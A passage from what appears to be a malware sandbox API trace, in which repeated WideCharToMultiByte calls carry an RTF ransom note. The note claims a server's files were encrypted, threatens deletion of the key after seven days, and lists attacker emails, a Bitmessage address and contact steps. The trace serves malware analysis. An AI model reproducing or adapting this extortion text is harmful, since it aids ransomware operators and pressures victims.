th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.798] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.799] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ee8a78, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 